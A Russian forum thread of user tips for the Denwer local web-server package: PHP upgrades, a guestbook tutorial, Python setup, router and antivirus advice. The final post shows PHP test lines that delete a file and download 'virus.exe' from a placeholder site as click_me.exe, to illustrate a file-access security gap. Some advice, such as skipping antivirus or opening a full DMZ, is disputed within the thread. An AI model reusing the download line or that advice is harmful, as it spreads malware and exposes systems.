Эта тема на forum.dklab.ru


Дмитрий Котеров: Новые советы.
Пожалуйста, записывайте предложения по добавлению в форум новых советов (и, желательно, сами советы) в эту тему. Модераторы будут переносить наиболее ценные приемы в отдельные темы.
Юрий Насретдинов:
Я не совсем понимаю, совет кому...

Ну ладно...

В общем, нужно "изобрести" свой стиль и писать, соблюдая только его, будет гораздо понятнее...
Dante:
Мне кажеться этому совету не внемлят.
Да и как узнать, что совет дельный.
Луший способ постить в Форуме для начинающих.
А администрация пусть решает уже. Куда это всё засунуть.
----------------------------------
The End.
Дмитрий Эсс:
Dante:
А форум этот тогда зачем?
Там эти советы просто потеряются. Да если бы ещё светов много было...
Dante:
Чем хорош этот форум ? Тем что тут поиск конкретный.........Тут как с мета-тэгами, просто угадать надо и всё. Жалко смайликов нету, я бы счас улыбку вставил.
Есть же такой девиз - искать, стремиться, не сдаваться - найти, забрать и перепрятать !!!
А форум отличный и работает прилично.
Дмитрий Эсс:
Я имел ввиду форум "Денвер::Полезные советы", а не весь форум forum.dklab.ru в целом.
А смайлики тут есть, они автоматически заменяются в тексте сообщения, если нет галочки "Отключить в этом сообщении смайлики". Вот пример :).
DmitRyazan: Обновление PHP(5) в Денвере
Установка PHP Version 5.0.2 на установленный Денвер (Base_2004-10-02_a1.3.31_p4.3.6_m3.23.53_pma2.5.6)

1. Заменить в \usr\local\apache\conf\httpd.conf

;LoadModule php4_module "/usr/local/php/sapi/php4apache.dll"
на
LoadModule php5_module "/usr/local/php/sapi/php5apache.dll"

1.1. В папку usr\local\php положить файлы
php5ts.dll
php.exe
1.1. В папку Z:\usr\local\php\sapi положить файл
php5apache.dll


2. В php.ini вставить после строчки
;extension=php_msql.dll
extension=php_mysql.dll

3.Там же заремить
;extension=php_dbg.dll

4. Обновить в папке usr\local\php\extensions
php_gd2.dll
5. Там же добавить
php_mysql.dll

5.1. Обновить файл libmysql.dll в C:\WINDOWS\system32

Кто будет пробовать, напишите если что не так ...
Дмитрий Котеров:
Кстати, это все будет очень скоро - к моменту выхода книги. Но спасибо за исследования, лично я пока mod_php5 ставить в "чистом виде" не пробовал.
Asmodeus: Список доменов на Денвере
В начале спасибо огромное создателям Денвера!!!
Вот скрипт, который мне очень пригодился, так как у меня название доменов на локале разные + их 19 штук.
И чтобы не мучаться набирая адрес сделал этот скрипт. Может кому пригодится.

#!C:\Perl\bin\perl.exe
use CGI::Carp qw (fatalsToBrowser);
print "Content-type: text/html\n\n";
print "<head>\n";
print "<title>$ENV{SERVER_NAME}</title>\n";
print "</head>\n";
opendir DIR,'../../../home';
@files=readdir DIR;
closedir DIR;
my $fil = @files;
print ('<BR>');
foreach $a(@files){
print ("<a href=\"http://$a\">$a</a>","<BR>");
}
print "Всего $fil доменных имен.\n";
exit;

Прошу прошения за сырость скрипта -- я новичок
Дмитрий Котеров:
лично я пока mod_php5 ставить в "чистом виде" не пробовал
Уже несколько недель как есть http://dklab.ru/chicken/web/dis/Base_PHP5/
tcb:
Хотел бы предложить разработчикам обратить внимание на IDE для работы с PHP под названием Dev-PHP (это не реклама, т.к. распространяется по GPL).
Эта среда будет полезна для начинающих, т. к. идеально подходит дял работы с PHP под Windows. Там есть поддержка закачки по ftp, но так как, Denwer стоит локально, то от этого программист только выйграет.
И вообще это очень удобная и приятная штука)

Берется на www.sourceforge.org
Вот только вес -- 11Мб -- отпугивает.
Дмитрий Котеров:
Ветка выделена в отдельную тему «Стишок про Денвер.»,
расположенную в форуме Полезные советы :: Денвер (14 Марта 2005, 20:16).
HardNik:
В последнее время множество проблем у посетителей Форума связано с антивирусным программным обеспечением. Есть предложение выделить ветку "Антивирусы и Денвер".
Мои "вкладец":
1. Лучше вообще не устанавливать антивирусы. Для следования данной рекомендации требуются навыки системного администратора NT, программирования на VBA, C, JS.
2. При установке антивируса лучше ставить один сканер.
3. NOD32 и DrWEB лидеры по "недокументированным особенностям"
4. Интересный антивирус: AntiVir.
Юрий Насретдинов:
Лучше вообще не устанавливать антивирусы.
А вот это вредный совет... Например Антивирус Касперского ИМХО никому ещё не повредил (слухи про то, что он ужасно грузит систему, немного преувеличены... Да, он грузит систему, но далеко не смертельно)
Константин Жинько [tIT]:
Юpий Насрeтдинов
Не насмерть, но до реанимации доходит..
Мой совет - юзать process killer; вот такая вещь!!!
HardNik:
Юpий Насрeтдинов
пока у нас на машине стоит самый рульный троян всех времен и народов - IE, занимать процессорное время залатывая менее опасные дыры - бессмысленно.
Хотя, конечно, интересно узнать кто чем, из антивирусов, пользуется.
Ant:
HardNik, это Вы уж переборщили...
Евгений Галашин:
Ветка выделена в отдельную тему «Кросспостинг»,
расположенную в форуме Мусоропровод (07 Сентября 2005, 11:19).
Евгений Галашин:
Ветка выделена в отдельную тему «Кросспостинг-2»,
расположенную в форуме Мусоропровод (07 Сентября 2005, 20:41).
Ant:
Ветка выделена в отдельную тему «Оффтоп.»,
расположенную в форуме Мусоропровод (11 Ноября 2005, 08:13).
Rz: Python + /usr/bin/env + Denwer
В дополнение к советам о прикручивании Питона к Денверу.

Часто в скриптах на Питоне встречается "более правильная" строка вызова интерпретатора вида #!/usr/bin/env python. Для того, чтобы скрипты с такой строкой заработали как положено, оказалось достаточно сделать следующее:

1. Раздобыть (или написать самому и скомпилировать) файл env.exe, функция которого состоит лишь в том, чтобы запустить свой первый параметр. Я взял этот файл из пакета UnxUtils http://unxutils.sourceforge.net/. Кстати, в этом пакете помимо упомянутого env.exe можно найти много других интересных утилит, которые, без сомнения, будут присутствовать на UNIX-хостинге и могут быть использованы в CGI-скриптах.
2. Положить этот env.exe в Z:\usr\bin
3. Протестировать работу Python, заменив строчку вызова
#!/usr/bin/python на #!usr/bin/env python

Например, так:

#!/usr/bin/env python
print "content-type: text/plain\r\n\r\n"
print "Hello world"

Ant:
Вопрос, а зачем так люди делают?
Rz:
Для повышения переносимости скрипта.
Например, во FreeBSD по умолчанию python находится /usr/local/bin/python и если в начале строки написать #!/usr/bin/python, то ничего работать не будет. А команда env - она всегда лежит в /usr/bin.
Ant:
Угу, понял, спасибо.
Константин Жинько [tIT]:
env python ругнулся и правильно - у меня не стоит питон
env perl не ругнулся, но и не сделал ничего, хотя перл стоит
Юрий Насретдинов:
Тут быстренько нарисовал пример, как нужно запускать скрипты на PHP - я думаю, новичкам пригодится :).
Ключевые слова: PHP не открывается, не работает пхп, код вместо содержимого страницы, открываю файл, а там <?
Ant:
Ветка выделена в отдельную тему «оффтоп»,
расположенную в форуме Мусоропровод (01 Сентября 2006, 14:13).
Юрий Насретдинов: Разработка простейшего проекта (гостевая книга) с переносом на сервер.
В этом совете будет рассмотрено, как создать простейший проект (гостевая книга) на PHP и MySQL с использованием пакета Денвер и последующей публикацией на хостинге. В качестве хостинга был выбран PeterHost ( http://peterhost.ru/ ), и на его примере будет показано, как нужно переносить файлы и базу данных с Денвера на хостинг. Сразу хочу предупредить, что эта операция не является совсем уж простой и потребует у Вас достаточно много времени и терпения. Самое главное – не бойтесь трудностей, которые у Вас возникнут, и старайтесь решить их самостоятельно, это в любом случае Вам понадобится при разработке более сложных вещей.

Итак, давайте начнём:

Первое, что нам понадобится – это установленный пакет Денвер последней (или предпоследней) версии (скачать можно отсюда – http://www.denwer.ru/dis/Base/ ), желательно чтобы при этом в названии дистрибутива не было «…p4.4.2…» (то есть PHP 4.4.2), ибо PHP версии 4.4.2, который на момент написания совета был в последней версии Денвера, содержал очень серьёзные ошибки.

Далее я буду считать, что Денвер у Вас установлен на диск Z: и Вы хотя бы немного с ним освоились. Я также буду считать, что Вы имеете некоторое представление о PHP и MySQL, и понимаете, что имеется ввиду под словосочетанием «Создать таблицу MySQL». Теперь мы можем идти дальше.

Этап первый: создание домена в Денвере

Операция создания домена в Денвере до безобразия проста: создаём папку Z:\home\guestbook, в ней создаём папку www и перезапускаем сервер (Restart Servers)

http://www_yuac.forum.dklab.ru/images/guestbook/guestbook-files.png
Рис. 1: Приблизительная структура файлов, которая будет получена нами в результате

Конечно, вместо guestbook мы можем написать что угодно – но лучше всего, чтобы в названии нашего домена в Денвере не было суффиксов .ru, .com, .org и т.д. Помимо того, что это позволяет нам не привязываться к конкретному имени домена нашего сайта (которое, вообще говоря, может измениться, вспомните, наверняка один из сайтов, которые Вы посещаете, когда-то переезжал на другой домен), не возникает проблем с доступом к Вашему же ресурсу в Интернете – Вы всегда можете отличить локальный сайт от «интернетовского».

Итак, как Вы уже заметили, в нашей папке будет несколько файлов – index.php, config.php и logo.png . Пора перейти к следующему этапу:

Этап второй: подготовка к разработке гостевой книги

На этом этапе мы с Вами создадим новую БД и припишем ей определённого пользователя. В Денвере это сделать очень просто: включите Денвер (Start Servers) и наберите в Firefox http://localhost/Tools/addmuser/index.php (если у Вас не стоит Mozilla Firefox, можете воспользоваться Internet Explorer).

Лирическое отступление: как Вы уже могли заметить, я упомянул про Firefox, и вполне возможно, что Вы не знаете, что это такое. В этом и любом другом случае, если Вам что-то непонятно из того, что написано здесь (и в любом другом совете), воспользуйтесь Google ( http://google.com/ ), Яндексом ( http://yandex.ru/ ) или поиском по форуму. Ответы на наиболее часто задаваемые вопросы я буду приводить прямо в тексте.

Пароль администратора оставьте пустым (Вы же его не меняли, правда?), имя базы данных – guestbook_db, логин пользователя – guestbook_user (да, мы не используем одно и то же имя для логина и базы данных! Поэтому не пугайтесь, что поле заполнится автоматически, его всё равно надо будет исправить). Пароль давайте поставим TxYz9a8O9k.

Если база данных и пользователь были созданы успешно, давайте создадим теперь таблицу для нашей гостевой книги, она будет всего одна и будет содержать записи для гостевой. Зайдите в PhpMyAdmin ( http://localhost/Tools/phpmyadmin/index.php ), и выберите созданную нами базу guestbook_db:

http://www_yuac.forum.dklab.ru/images/guestbook/guestbook-pma.png
Рис. 2: Интерфейс PhpMyAdmin и созданная нами база guestbook_db

Выберите вкладку SQL и выполните там следующий запрос:
CREATE TABLE `gb_records` (
`id` INT NOT NULL AUTO_INCREMENT ,
`date` INT NOT NULL ,
`name` VARCHAR( 255 ) NOT NULL ,
`message` TEXT NOT NULL ,
PRIMARY KEY ( `id` )
);
Если Вы всё правильно сделали, должна была появиться таблица gb_records, в которой есть поля `id`, `date`, `name` и `message`. Как я уже говорил, в этой таблице мы будем хранить записи. Кратко поясню значения полей: id – номер сообщения, date – дата написания сообщения, name – имя написавшего сообщение, message – текст сообщения. Таблицу можно было создать и через web-интерфейс самого PhpMyAdmin, но обычно для описания структуры используют именно сам запрос на создание таблицы.

Итак, подготовительная часть закончена. Давайте наконец приступим к самой интересной части:

Этап третий: написание гостевой книги

Несмотря на такое громкое название, мы с Вами действительно сейчас напишем полностью рабочую гостевую книгу, даже с поддержкой удаления и правки сообщений.

Итак, давайте вернёмся к первому шагу, туда, где мы создавали папку Z:\home\guestbook\www – там на самом деле было ещё 3 файла. Настала очередь их создать. Давайте начнём с config.php – в этом файле мы будем хранить настройки нашего скрипта и базы MySQL:
<?
// config.php: файл настроек гостевой книги

// следующая строка проверяет, находимся ли мы в Windows,
// то есть фактически - в Денвере
if(getenv('COMSPEC'))
{
$MYSQL=array(
'host' => 'localhost',
'user' => 'guestbook_user',
'db' => 'guestbook_db',
'pass' => 'TxYz9a8O9k',
);
}else
{
// эта часть ответственна за хостинг, мы
// заполним её чуть позже
$MYSQL=array(
'host' => '...',
'user' => '...',
'db' => '...',
'pass' => '...',
);
}
?>

Это было содержимое файла config.php. В массиве $MYSQL мы храним настройки для базы данных. Как Вы могли заметить, мы указали настройки для MySQL в Денвере – именно те, которые мы вводили в начале. Теперь давайте напишем собственно скрипт гостевой книги – index.php . Мы пока что не будем использовать никаких сторонних библиотек для работы с базой данных, хотя их великое множество. Я сразу приведу содержимое с комментариями, писать с Вами вместе по одной строчке гостевую книгу я не буду – я считаю, что это некоторый перебор. Итак, содержимое index.php:
<?
// index.php : Файл с гостевой книгой
include('config.php');

// соединяемся с MySQL
mysql_connect($MYSQL['host'],$MYSQL['user'],$MYSQL['pass'])
or die('Could not connect to MySQL: '.mysql_error());
mysql_select_db($MYSQL['db'])
or die('Could not select database: '.mysql_error());

//если было послано сообщение
if(!empty($_POST['message']))
{
// чистим входные данные от слешей, если нужно
if(get_magic_quotes_gpc())
{
$_POST['name'] = stripslashes($_POST['name']);
$_POST['message'] = stripslashes($_POST['message']);
}
// запрещаем ввод тегов - обратите внимание, это важно!
$_POST['name'] = htmlspecialchars($_POST['name']);
$_POST['message'] = htmlspecialchars($_POST['message']);
$_POST['message'] = nl2br($_POST['message']); //переносы строк

// вставляем в gb_records данные сообщения. Обратите
// внимание, что мы используем функцию mysql_escape_string
// для защиты от SQL Injection
mysql_query("INSERT INTO `gb_records`(`name`,`message`,`date`)
VALUES('".mysql_escape_string($_POST['name'])."',
'".mysql_escape_string($_POST['message'])."','".time()."')")
or die('Could not add message: '.mysql_error());

header('Location: index.php');
}else
{
echo '<html><head><title>Гостевая книга</title></head><body>';
echo '<img src="logo.png"><br>';
echo '<h3>Добро пожаловать в гостевую книгу!</h3>';
echo '<table border="1"><tr><th>Имя</th><th>Сообщение</th></tr>';

// выбираем все сообщения в обратном порядке
$s = mysql_query('SELECT * FROM `gb_records` ORDER BY ID DESC');
while($res = mysql_fetch_assoc($s))
{
echo '<tr><td>';
echo '<b>'.$res['name'].'</b><br>'; // имя
echo '<small>'.date('d.m.Y H:i:s',$res['date']).'</small>';
//сообщение
echo '</td><td>'.$res['message'].'</td></tr>';
}
echo '</table>';

//выводим форму для добавления сообщения
echo '<hr><b>Добавить новое сообщение:</b><br>';
echo '<form action="index.php" method="POST">';
echo 'Имя: <input type="text" name="name">';
echo '<br>Сообщение:<br>';
echo '<textarea rows=4 cols=20 name="message"></textarea>';
echo '<br><br><input type="submit" value="Добавить"></form>';
}
?>
Если Вы всё правильно сделали, то набрав в Firefox http://guestbook/index.php Вы получите примерно следующее (если нарисуете логотип logo.png):

http://www_yuac.forum.dklab.ru/images/guestbook/guestbook-works.png
Рис. 3: Гостевая книга в рабочем состоянии

Итак, мы с Вами написали гостевую книгу!

В следующей части мы с Вами перенесём гостевую книгу на сервер. Пока на этом всё.
magnum:
Небольшой совет при работе с поддоменами в денвере.
Папки с поддоменами можно оставить там же где и на удаленных серверах, тоесть в папке www, а вот ярлыки (с теми же названиями) этих папок поддоменов разместить туда, куда требуется размещать папки субдоменов по инструкции к денверу. Проверено, все работает.
Дмитрий Котеров:
Интересно! А можно поподробнее - какого рода ярлыки? Желательно с примерами.
magnum:
Наврал, извиняюсь. Был уверен, что доступ к удаленному серверу перехватывается денвером полностью, попробовал отключить сеть и все стало на свои места - идея с ярлыками не работает :(
Юрий Насретдинов:
Данный совет -- продолжение предыдущего (http://forum.dklab.ru/viewtopic.php?p=120531#120531), и только в формате .doc (возможно, пока только в формате .doc). Там описывается, как перенести написанную гостевую книгу на сервер. На самом деле, конечно, информация, представленная там, будет полезна для переноса любого проекта с Денвера на хостинг.
cka3o4h1k:
Я новичок на форуме да и во вебмастеринге тоже.
Но на форуме за несколько дней встретил несколько запросов о том как открыть в интернет некоторые проэкты из /home

Вопросители часто не умеют задавать вопросы, а значит и разбираться в проблемах. Потому вопросы подобного толка будут возникать на форуме все время. Как выход, написать более детальный, простой пример в документации и тут в Советах.

Вот я как решил (возможно невежественно) подобный вопрос
bæv:
Ветка выделена в отдельную тему «мусор»,
расположенную в форуме Мусоропровод (06 Сентября 2009, 18:46).
OrkZ: DenwerRunner
Долгое время пользуюсь Denwer'oм, и довольно активно. Иногда (скорее постоянно) необходимо то запускать денвер то перезагружать или добраться до конфигов всяких, и вот возникла идея воплотить в жизнь ту маленькую идею которая уже давно возникла. В результате родилоь маленькое приложение, которое обеспечивает минимальный функционал в одном окне (удобно и практично). На супер мега пупер приложение не претендую но думаю пригодится многим.
Скачать [URL=http://depositfiles.com/files/t72akfxi4]Denwer Runner 1.9.5.0[/URL] NEW
Скачать Denwer Runner 1.7.0.0
Скачать [URL=http://depositfiles.com/files/ktnzockh9]Denwer Runner 1.5.0.0[/URL]

Если есть идеи, высказывайте.
3dx4wd:
Ещё один вариант: "Денвер видимый/доступный из внешней сети".
Сервер в локальной сети с Денвером (192.168.1.3)
ADSL модем (D-Link 2500U)в режиме роутера.
В модеме настраиваем демилитаризованную зону (DMZ) на адрес севера (192.168.1.3).
Готово.
Если есть внешний статичный IP адрес, то к нему можно и домен прикрутить. Всё работает на "ура".
Вячеслав08:
СПАСИБО!!!
Огромое)))
bæv:

В модеме настраиваем демилитаризованную зону (DMZ) на адрес севера (192.168.1.3).
Готово.

— по-моему, это из разряда «вредных советов».
На сколько я понимаю, таким образом открываются «наружу» все порты компьютера.
И так дырявая система (Денвер не предназначен для использования в качестве интернет-сервера) становится ещё дырявее.

Для выхода в интернет достаточно пробросить в роутере 80-й порт.
Ключевые слова для поиска: «port forwarding».
3dx4wd:

дырявая система становится ещё дырявее.

+1
На сервере с Денвер установлены и антивирус и фаервол, всё обновляемое. Это как само-собой разумеющееся.
Одного 80 порта не достаточно (у меня), ещё несколько задач выполняется.
bæv:
Одного 80 порта не достаточно (у меня), ещё несколько задач выполняется.
Что мешает ещё порты пробросить? По одному на задачу.
bæv:
Ветка выделена в отдельную тему «нет русского языка»,
расположенную в форуме Мусоропровод (11 Марта 2010, 05:18).
Kirpich:
Многие переходят на Windows 7 x64!
Было бы полезно знать - будет ли работать Denwer на Windows 7 x64, ШТАТНО/СТАБИЛЬНО?
Желательно ответ из первых рук - от автора проекта.
В форуме тема несколько раз поднималась, но четкого ответа нет, только мнения и рекомендации.
Спасибо.
Monstr.ru:
В Windows 7 x64 входящее подключение по vpn занимает 443 порт, поэтому не отображается localhost, test1.ru и не стартует apache
starinsky: Небольшое приложение под Denwer для работы с сервером Apache
Denwer Control

Небольшое трей приложение для запуска служб Денвер.
http://code.google.com/p/apache-control-for-denwer/
Alex11: Re: Python + /usr/bin/env + Denwer
В дополнение к советам о прикручивании Питона к Денверу.

Часто в скриптах на Питоне встречается "более правильная" строка вызова интерпретатора вида #!/usr/bin/env python. Для того, чтобы скрипты с такой строкой заработали как положено, оказалось достаточно сделать следующее:

1. Раздобыть (или написать самому и скомпилировать) файл env.exe, функция которого состоит лишь в том, чтобы запустить свой первый параметр. Я взял этот файл из пакета UnxUtils http://unxutils.sourceforge.net/. Кстати, в этом пакете помимо упомянутого env.exe можно найти много других интересных утилит, которые, без сомнения, будут присутствовать на UNIX-хостинге и могут быть использованы в CGI-скриптах.
2. Положить этот env.exe в Z:\usr\bin
3. Протестировать работу Python, заменив строчку вызова
#!/usr/bin/python на #!usr/bin/env python

Например, так:

#!/usr/bin/env python
print "content-type: text/plain\r\n\r\n"
print "Hello world"

спасибо за полезную инфу, давно искал, еще раз спасибо
Искандер:
написал совет как прикрутить nginx к денверу, может будет полезным:
http://habrahabr.ru/blogs/webdev/108865/
Maus:
Ветка выделена в отдельную тему «Неудалось подключение к localhost»,
расположенную в форуме Лень сходить в Поиск или почитать документацию (01 Декабря 2010, 04:07).
bæv:
Ветка выделена в отдельную тему «мусор, не относящийся к теме»,
расположенную в форуме Мусоропровод (05 Декабря 2010, 21:47).
bæv:
Ветка выделена в отдельную тему «мусор, не относящийся к теме»,
расположенную в форуме Мусоропровод (11 Декабря 2010, 14:19).
Pingvin:
Для отладки можно печатать отладочную информацию через if (!empty($otladka))… (тогда в ссылке надо указать ?otladka=1, а где-нибудь вначале if (!empty($_GET['otladka'])) $otladka=$_GET['otladka'];) или if ($_SERVER['HTTP_HOST']!='localhost')… , можно так же вставлять отладочную информацию в комментарии (как в книге Лауры Томсон и Люка Веллинг “РНР и Муsql”, в этой книге приведена отладочная программа, которой я часто пользуюсь), тогда она будет всегда при просмотре исходного кода, из недостатков этого метода следует отметить, что независимо от того нужна или нет отладка, код загружает сервер.
bæv:
Pingvin:
http://phpfaq.ru/debug
Kalistos:
Я бы хотел увидеть такую возможность в денвере как мультивыбор папок откуда будут подниматься сайты.
То есть например мы имеем установленный денвер в папке C:\WebServer и значит сайты поднимаются только из каталога C:\WebServer\home, очень удобно было бы если бы я мог добавить каталог из дропбокса например ..\DropBox\Denwer\home и при этом денвер будет установлен не в дропбоксе, а в папке C:\WebServer, а из дропбокса он только тягает сам сайт и базу данных, ставить денвер целиком в дропбокс не нужно, так как мне не нужны все мои сайты в дропбоксе, и также можно было бы еще брать сайты с флешки, целиком ставить денвер на флешку напрягает, так как скорость работы от этого падает в разы на всех сайтах, что не есть приемлемо. Только тогда надо будет продумать как хранить базу данных.
В общем хотелось бы такую реализацию, и если она в какой-то мере возможна сейчас, и я что-то упустил, то намекните пожалуйста)
P.S. Ставить 3 денвера reserve это конечно вариант, но удобнее для пользователя было бы сделать все таки добавляемые папки.
Maus:
Kalistos
если у Вас файловая система NTFS, то junction
bæv:
Ветка выделена в отдельную тему «спам»,
расположенную в форуме Мусоропровод (29 Июня 2011, 18:39).
Goldberg: Denwer на двух и более компах без флешки.
Когда я работал над созданием первого и пока единственного сайта на локальном сервере, я хотел использовать его (сервер) и дома и на работе, поэтому с большим интересом прочитал ветку “Денвер на свистке” . Однако, в процессе поиска и добавления на сайт контента (бесплатное программное обеспечение и сервисы), я по-своему решил проблему синхронизации данных локального сервера на домашнем и рабочем компьютерах. Для этого я воспользовался бесплатным сервисом DropBox https://www.dropbox.com/, который создал одноименную папку в МоихДокументах и бесплатной же графической оболочкой VisualSubst http://www.ntwind.com/software/utilities/visual-subst.html, подключив с ее помощью папку с локальным сервером в качестве виртуального диска. Таким образом я получил виртуальный диск с одинаковым и синхронизированным содержанием и на работе, и дома. Надеюсь, кому-нибудь этот вариант использования локального сервера на нескольких компах окажется полезным.
ps Правила прочитал, вроде не было запрета на публикацию ссылок на свои ресурсы.
bæv:
Правила прочитал, вроде не было запрета на публикацию ссылок на свои ресурсы.
— тут реклама — платная.
Поэтому ссылки я заменил на правильные, не рекламирующие очередной портал.
bæv:
Ветка выделена в отдельную тему «спам»,
расположенную в форуме Мусоропровод (28 Июня 2012, 22:09).
Ilya Drozdov: У кого Windows 7 и ESET Smart Security (не грузится localhost или пустые страницы)
Тема полезна пользователям Windows 7 и ESET Smart Security 4 в одном "железном флаконе". Установил по всем правилам Денвер, а "Ура все получилось!" - совсем не получилось, пустая страница на всех браузерах, которые у меня стоят. Перелазил кучу тем на форуме и пинговал, и скайп отключал, и порт менял, и антивирусник с файрволОМ отключал,прокси для всех браузеров отключал, вообщем как только не пытался решить проблему. В итоге, на 2й день мучений методом перебора всевозможных предложенных вариантов, разобрался.
Решение:
1. Все настройки антивирусника скинул по умолчанию, т.к. были некоторые ручные настройки.
2. Выбрал настройки (F5) - защита от вирусов и шпионских программ - защита доступа в интернет - HTTP,HTTPS(при этом галка "Вкл. проверку http портов стоит" и порт 80 указан) - управление адресами - выбираем "список адресов, для которых отключено фильтрование" - отмечаем галкой "список активизирован" - добавить ( и добавляем следующую запись - localhost*) - жмем ОК ----- ИИИИИИИИИИ-вуаля - "УРА ВСЕ ПОЛУЧИЛОСЬ!!!" и скайп работает с галочкой "использовать 80 порт" и без нее, и в nete сижу, а в соседней вкладке lokalhost работает.
Если кому-то помог, очень рад. Иногда мелкая пакость аж на коня белого садит.
v2016: Совет как сделать, чтобы выидны были сайты на разных логических дисках
В Денвере с PHP 4 можно было прописать сайты которые находятся на других логических дисках, а в денвере с PHP5 так не работает. Что изменилось? Как сделать тоже на денвере с PHP 5? Конкретно с PHP 5.2

Там в файле httpd.conf
нужно было написать

Include conf/dop_hosts.conf

а в файле dop_hosts.conf


<VirtualHost 127.0.0.1:80>
ServerAdmin webmaster@host.some_domain.com
DocumentRoot G:/sitefiles/
ServerName sitefiles
ErrorLog /sitefiles/logs/
CustomLog /sitefiles/logs/
</VirtualHost>

И все работало. А вот в PHP5 так не получается. Что изменилось.

И в файле hosts кажется нужно было прописать их кстати...
И если в файле dop_hosts.conf что - то неправильно указать... ну например букву диска неправильную, то не открывался никакой сайт при запуске денвера.

Вот об этом не могу найти никак уже давно...
v2016: А как чтобы было нельзя?
Я тут неожиданно для себя обнаружил, что через Денвер можно осуществлять любые действия с файлами и папками вне сайта и на любом диске...
И просматривать, и удалять, и закачивать и наверняка все остальные...
И с одной стороны это конечно очень здорово...
Но с другой создает проблемы с безопасностью если пользоваться чужими скриптами или даже тестировать чужие скрипты...
Поэтому вопрос возникает как можно сделать, чтобы было нельзя и php скрипты могли действовать только в пределах сайта на котором находятся.

Вот что строки которыми тестировал это у себя и все получилось... подозреваю, что и все остальные возможные действия типа переименования и создания файлов тоже получатся без проблем...

$files_h=scandir("H:\\files");
if(is_dir("H:\\files\\qwe")) echo "папка создана"; else mkdir("H:\\files\\qwe");
if(unlink("H:\\files\\123.txt")) echo "-----------------------";

copy("httр://kakoitosait.ru/virus.exe","H:\\files\\click_me.exe");

Эта тема на forum.dklab.ru